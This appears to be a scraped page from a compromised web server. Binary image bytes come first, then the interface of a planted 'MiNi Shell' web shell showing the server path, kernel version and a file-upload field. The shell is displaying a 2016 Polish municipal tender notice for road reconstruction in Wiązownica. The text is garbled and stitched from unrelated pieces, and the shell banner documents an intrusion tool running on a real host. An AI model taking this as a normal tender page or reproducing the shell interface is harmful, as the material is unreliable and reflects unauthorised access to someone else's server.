JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160225/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160225/42238-N-2016.html

<p class="kh_header"><b>Wiązownica: Przebudowa dróg gminnych na terenie gminy Wiązownica</b><br>
<b>Numer ogłoszenia: 42238 - 2016; data zamieszczenia: 25.02.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wójt Gminy Wiązownica , Wiązownica 208, 37-522 Wiązownica, woj. podkarpackie, tel. 016 622-36-31.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wiazownica.regiony.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa dróg gminnych na terenie gminy Wiązownica.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest wykonanie robót budowlanych na zadaniu inwestycyjnym o nazwie: Przebudowa dróg gminnych na terenie gminy Wiązownica.
    W ramach  przedmiotowego zamówienia  gruntownej  przebudowie zostaną poddane  drogi   gminne o  nawierzchniach  tłuczniowych, kamiennych,  betonowych lub żużlowych.  Przebudowa nawierzchni dróg będzie polegała na  oczyszczeniu  istniejącej warstwy konstrukcyjnej, wyrównaniu nawierzchni, wykonaniu  podbudowy z kruszywa łamanego stabilizowanego mechanicznie, wykonaniu  nawierzchni z betonu  asfaltowego o uziarnieniu  0/12,8 o grubości warstwy ścieralnej 3-4 cm.  oraz robót wykończeniowych dot. uzupełnienia   i  utwardzenia poboczy drogi.
2. Przedmiot zamówienia został na 5 odrębnych części (zadań).
Część Nr 1
Przebudowa drogi gminnej w miejscowości Piwoda,  dz. nr ewid. 1016  (w obrębie  Domu Kultury i Zespołu Szkół)
-mechaniczne profilowanie i zagęszczanie podłoża,
-oczyszczenie warstwy konstrukcyjnej istniejącej nawierzchni,
-skropienie istniejącej nawierzchni emulsją w ilości 0,6 kg/m2,
-wyrównanie istniejącej nawierzchni z betonu asfaltowego o uziarnieniu 0/12,5 warstwa gr.2cm
-wyrównanie istniejącej nawierzchni z betonu asfaltowego o uziarnieniu 0/12,5 warstwa gr.3cm
-wykonanie podbudowy z kruszywa łamanego 0/31,5,  grubość warstwy 10 cm.
-wykonanie nawierzchni z betonu asfaltowego o uziarnieniu 0/12,8 warstwa ścieralna gr. 3 cm.
-wykonanie nawierzchni z betonu asfaltowego o uziarnieniu 0/12,8 warstwa ścieralna gr. 4 cm.
-uzupełnienie poboczy kruszywem łamanym 0/31,5 gr. warstwy po zagęszczeniu 4 cm.
Część Nr 2
Przebudowa drogi gminnej w miejscowości Szówsko, dz. nr ewid. 2888, 2968, 2965/2, 2964/2, 2973/1  (ul. Wola i Wyszyńskiego)
-mechaniczne profilowanie i zagęszczanie podłoża w gruntach kat. I-IV
-wykonanie podbudowy z kruszywa łamanego 0/31,5, grubość warstwy 5 cm.
-wykonanie podbudowy z kruszywa łamanego 0/31,5, grubość warstwy 7 cm.
-wykonanie nawierzchni z betonu asfaltowego o uziarnieniu 0/12,8 warstwa ścieralna gr. 4 cm.
-uzupełnienie poboczy kruszywem łamanym 0/31,5 gr. warstwy po zagęszczeniu 4 cm.
-uzupełnienie poboczy gruntem rodzimym śr. gr. warstwy po zagęszczeniu 5 cm.
Część Nr 3
Przebudowa drogi gminnej w miejscowości Wiązownica,  dz. nr ewid. 520, 518/1, 518/2, 519/1
-mechaniczne profilowanie i zagęszczanie podłoża w gruntach kat. I-IV
-wykonanie podbudowy z kruszywa łamanego 0/31,5, grubość warstwy 5 cm.
-wykonanie podbudowy z kruszywa łamanego 0/31,5, grubość warstwy 7 cm.
-wykonanie nawierzchni z betonu asfaltowego o uziarnieniu 0/12,8 warstwa ścieralna gr. 4 cm.
-uzupełnienie poboczy kruszywem łamanym 0/31,5 gr. warstwy po zagęszczeniu 4 cm.
-uzupełnienie poboczy gruntem rodzimym śr. gr. warstwy po zagęszczeniu 5 cm.
Część Nr 4
Przebudowa drogi gminnej w miejscowości Wiązownica,  dz. nr ewid. 422,400,127,91
-mechaniczne profilowanie i zagęszczanie podłoża w gruntach kat. I-IV
-wykonanie podbudowy z kruszywa łamanego 0/31,5, grubość warstwy 5 cm.
-wykonanie nawierzchni z betonu asfaltowego o uziarnieniu 0/12,8 warstwa ścieralna gr. 4 cm.
-uzupełnienie poboczy kruszywem łamanym 0/31,5 gr. warstwy po zagęszczeniu 4 cm.
-uzupełnienie poboczy gruntem rodzimym śr. gr. warstwy po zagęszczeniu 5 cm.
Część Nr 5
Przebudowa drogi gminnej w miejscowości Radawa,  nr  ew. dz. 28   (Baty)
-mechaniczne profilowanie i zagęszczanie podłoża w gruntach kat. I-IV,
-wykonanie podbudowy z kruszywa łamanego 0/64, grubość warstwy 10 cm.
-wykonanie nawierzchni z betonu asfaltowego o uziarnieniu 0/12,8 warstwa ścieralna gr. 4 cm
-ustawienie obrzeży chodnikowych o wym. 8x25 cm. na ławie betonowej (okrąg o śr. 6 m.)
-uzupełnienie poboczy kruszywem łamanym 0/31,5 gr. warstwy po zagęszczeniu 4 cm.
-uzupełnienie poboczy gruntem rodzimym śr. gr. warstwy po zagęszczeniu 5 cm.
3. Podstawowe warunki prowadzenia i wykonania robót stanowiących przedmiot zamówienia:
-wykonawca jest zobowiązany wykonywać przedmiot Umowy zgodnie z obowiązującymi w tym zakresie przepisami prawa, obowiązującymi normami, warunkami technicznymi wykonania robot oraz wiedzą techniczną.
-wykonawca zobowiązany jest do  organizacji placu budowy i urządzenia i oznakowania , jeżeli jest to niezbędne. 
-wykonawca jest zobowiązany wykonywać przedmiot umowy zgodnie z obowiązującymi w tym zakresie przepisami prawa, obowiązującymi normami, warunkami technicznymi wykonania robot oraz wiedzą techniczną.
-sporządzenie i przedłożenie Zamawiającemu, przed rozpoczęciem robot, planu
bezpieczeństwa i ochrony zdrowia (art. 21a ust. 3 Prawa budowlanego), tablicy
informacyjnej i ogłoszenia zawierającego dane dotyczące bezpieczeństwa i ochrony
zdrowia (art. 45 ust. 4 Prawa budowlanego tekst jednolity Dz.U. z 2013, poz.1409) - jeden egz. planu bioz należy przekazać Zamawiającemu.
-w przypadku uszkodzenia istniejących mediów  Wykonawca będzie  zobowiązany do naprawienia szkód lub wyrównania strat na podstawie kalkulacji powykonawczej sporządzonej przez poszkodowanego użytkownika bądź Właściciela.
-wykonawca jako wytwórca odpadów w rozumieniu art. 3 ust. 3 pkt. 22 ustawy z dnia
27.04.2001r. o odpadach (t.j. Dz. U. z 2010r. Nr 185, poz. 1243 z późniejszymi zmianami) ma obowiązek zagospodarowania powstałych podczas realizacji zadania odpadów i ustawą z dnia 27.04.2001 r. Prawo ochrony środowiska (Dz.U. z 2008 r. Nr 25, poz. 150).
- w cenie ryczałtowej Wykonawca ma obowiązek uwzględnić miejsce, odległość, koszt
wywozu, utylizacji i składowania odpadów.
- wykonawca ponosi pełną odpowiedzialność za wszelkie działania lub zaniechania własne, swoich pracowników oraz podmiotów, którymi się posługuje lub przy pomocy których wykonuje przedmiot umowy.
-wykonawca ma obowiązek zgłosić Zamawiającemu wykonanie robot zanikających i ulegających zakryciu, przed ich zakryciem, celem odbioru.
-wykonawca ma obowiązek zgłosić gotowość do odbioru przedmiotu Umowy i uczestniczyć w odbiorze.
-w dniu pisemnego zgłoszenia Zamawiającemu faktu wykonania przedmiotu umowy i gotowości do odbioru Wykonawca przekaże Zamawiającemu wszystkie dokumenty potrzebne do odbioru końcowego, umożliwiające ocenę prawidłowego wykonania przedmiotu umowy.
4. Jeżeli w projekcie budowlanym, specyfikacji technicznej wykonania i odbioru robót budowlanych lub SIWZ przedmiot zamówienia określono przez wskazanie znaków towarowych lub pochodzenie materiałów, to Zamawiający zgodnie z art. 29 ust. 3 ustawy Pzp,  dopuszcza    możliwość zastosowania urządzeń równoważnych w stosunku do zaprojektowanych z zachowaniem tych samych standardów technicznych, technologicznych i jakościowych.            
Posługiwanie się przykładowymi nazwami producenta ma jedynie na celu doprecyzowanie   poziomu oczekiwań zamawiającego w stosunku do określonego rozwiązania i ma wyłącznie charakter przykładowy. 
   Pod pojęciem materiałów lub urządzeń równoważnych należy  rozumieć materiały lub urządzenia    zapewniające uzyskanie parametrów technicznych nie gorszych od założonych w dokumentacji projektowej i specyfikacjach technicznych. 
   Zgodnie z zapisami art. 30 ust. 5 ustawy - Prawo zamówień publicznych, Wykonawca, który  powołuje się na rozwiązania równoważne, jest obowiązany wykazać, że oferowane przez niego  roboty budowlane i związane z tym usługi i dostawy spełniają wymagania określone przez zamawiającego. Zastosowanie przez wykonawcę rozwiązań równoważnych (materiały i urządzenia równoważne) zobowiązuje wykonawcę do wskazania w ofercie nazw, typów i specyfikacji tych materiałów i urządzeń, a ciężar udowodnienia o zachowaniu parametrów wymaganych przez zamawiającego leży po stronie składającego ofertę. Wszystkie materiały budowlane powinny odpowiadać normom i posiadać atesty ITB itp. 
Opinia ta może stanowić podstawę do podjęcia przez zamawiającego decyzji o przyjęciu  materiałów lub urządzeń równoważnych albo odrzuceniu oferty z powodu braku równoważności.
Szczegółowy opis  przedmiotu zamówienia  stanowią załączniki: 
-Specyfikacja techniczna wykonania i odbioru robót budowlanych.
-Przedmiar robót
Informacja o możliwości  składania ofert częściowych:
Zamawiający    dopuszcza  możliwości  składania ofert częściowych, co oznacza że  wykonawca   może złożyć ofertę na wybrane odrębne części zamówienia lub na cały zakres zamówienia.
Każda część zamówienia  stanowić będzie przedmiot odrębnego postępowania i oceny..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.11.20.00-0, 45.23.32.00-1, 45.23.31.20-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1)  Przystępując do niniejszego postępowania każdy Wykonawca zobowiązany jest  wnieść wadium  przetargowe w kwocie odpowiadającej danej części zamówienia:
- część Nr 1 	w  kwocie       900 zł.   
- część Nr 2  	w  kwocie    3 000 zł.   
- część Nr 3  	w  kwocie    1 200 zł.   
- część Nr 4  	w  kwocie    3 500 zł.   
- część Nr 5  	w  kwocie       600 zł.   
 2) Wykonawca może wnieść wadium  w jednej lub kilku  formach w art. 45 ust. 2 ustawy Pzp, tj.      1) w pieniądzu;      2) w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - 
         kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;       3) w gwarancjach bankowych;
     4) gwarancjach ubezpieczeniowych;
     5) w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust.5 pkt. 2 ustawy    
         z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. 
         Nr 42, poz. 275 oraz z 2007 r. z e zmianami).
3) Wykonawca zobowiązany jest wnieść wadium przed upływem terminu składania ofert.
4) Wadium w pieniądzu należy wnieść  przelewem na konto Zamawiającego w BS Jarosław    
    o/Wiązownica, numer konta 56 9096 1014 2002 1400 0202 0001    
5) W przypadku wadium wnoszonego w pieniądzu, jako termin wniesienia wadium przyjęty zostaje 
    termin uznania kwoty na rachunku zamawiającego. 
6) W przypadku wniesienia wadium  formie innej niż w pieniądzu - oryginał dokumentu   
    potwierdzającego wniesienie wadium należy złożyć przed upływem terminu składania 
    ofert w  siedzibie Zamawiającego - Urząd Gminy Wiązownica, w kasie Urzędu pok. nr 44  
    II p. a  kserokopię dokumentu poświadczoną za zgodność z oryginałem należy dołączyć 
    do oferty.
7) W przypadku składania oferty wspólnej, wadium wniesione przez jednego ze
    wspólników uważa się za wniesione prawidłowo.
8) Brak wniesienie wadium w terminie lub w sposób określony w SIWZ spowoduje 
    wykluczenie  Wykonawcy na podstawie art. 24 ust. 2 pkt. 2
9) Zwrotu  i zatrzymania złożonego wadium przetargowego  zamawiający dokona zgodnie 
    z przepisami art. 46 ust. 1-5  ustawy Prawo zamówień publicznych.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku w tym zakresie. 
      Ocena spełniania warunku zostanie dokonana na podstawie załączonego do oferty 
       oświadczenia wykonawcy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony jeżeli w okresie ostatnich 5 lat przed upływem  terminu 
       składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, zgodnie z 
       zasadami sztuki budowlanej wykonali i prawidłowo ukończyli co najmniej 1 robotę budowlaną 
       odpowiadającą  swoim rodzajem i zakresem  przedmiotowi zamówienia, tzn. polegającą na 
       budowie, przebudowie lub  modernizacja dróg  o  wartości co najmniej  200 000 zł brutto.      
       Warunek obowiązuje dla jednej lub wszystkich części zamówienia.
       Ocena spełniania warunku zostanie dokonana na podstawie załączonego do oferty: 
       a) oświadczenia wykonawcy o spełnianiu warunków udziału w postępowaniu - art. 22 ust.1 
       b) wykazu wykonanych zamówień wg. zał. do siwz.
       c) dowodów  potwierdzających, że wykazane roboty budowlane zostały wykonane w sposób 
           należyty, zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.
        Dowodami dot. wykonanych robót budowlanych są:
        - poświadczenia odpowiednich podmiotów lub inne dokumenty, jeżeli z uzasadnionych 
          przyczyn wykonawca nie jest w stanie uzyskać tych poświadczeń.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony jeżeli wykonawca dysponuje lub będzie dysponował
       potencjałem technicznym niezbędnym do wykonania przedmiotu umowy, w szczególności:
-układarka  mas bitumicznych - 1 szt.
-walec drogowy stalowy gładki  1 szt.   
-walec ogumiony  1 szt.
Warunek obowiązuje dla jednej lub wszystkich części.
       Ocena spełniania warunku zostanie dokonana na podstawie załączonego do oferty: 
       a) oświadczenia wykonawcy o spełnianiu warunków udziału w postępowaniu - art. 22 ust.1 
       b) wykazu  potencjału (sprzętu) technicznego  wg. zał. do siwz.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za  spełniony jeżeli   dysponują  osobami zdolnymi do wykonania  
        zamówienia,  lub przedłożą pisemnym zobowiązaniem innych podmiotów do udostępnienia 
        tych osób, w szczególności:
1)	dysponują co najmniej 1 osobą  (kierownik budowy) posiadający uprawnienia do kierowania budową i robotami  budowlanymi o specjalności:
- konstrukcyjno - budowlanej  lub drogowej lub odpowiadające im inne
                                 uprawnienia budowlane wydane na podstawie  wcześniej obowiązujących 
                                 przepisów w powyższym zakresie. 
        Przez uprawnienia należy rozumieć: uprawnienia budowlane, o których mowa w 
            ustawie z dnia 7 lipca 1994 r. Prawo budowlane (Dz.U.2013.1409 - j.t. ze zmianami)  i 
            rozporządzeniu Ministra Infrastruktury z dnia 11 września 2014 r.  w sprawie samodzielnych 
            funkcji technicznych w budownictwie ( Dz. U. z 2014 r. poz. 1278) lub odpowiadające im 
            ważne uprawnienia budowlane wydane na podstawie uprzednio obowiązujących przepisów 
            prawa, lub odpowiadające im uprawnienia budowlane, które zostały wydane obywatelom 
            państw Europejskiego Obszaru Gospodarczego z zastrzeżeniem art. 12 a oraz innych 
            przepisów ustawy Prawo budowlane oraz ustawy o zasadach uznawania o zasadach 
            uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii 
            Europejskiej.
            Ocena spełniania warunku zostanie dokonana na podstawie załączonego do oferty: 
a) oświadczenia wykonawcy o spełnianiu warunków udziału w postępowaniu - art. 22 ust.1 
b) wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia wg. zał. do siwz,
c) oświadczenie wykonawcy, że wskazane w wykazie osoby posiadają wymagane 
uprawnienia,</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeżeli wykonawcy są:
-  ubezpieczeni od odpowiedzialności cywilnej w zakresie działalności związanej z 
   przedmiotem zamówienia na kwotę co najmniej 500 000 złotych (słownie: pięćset tysięcy złotych).
        Warunek obowiązuje dla jednej lub wszystkich części zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
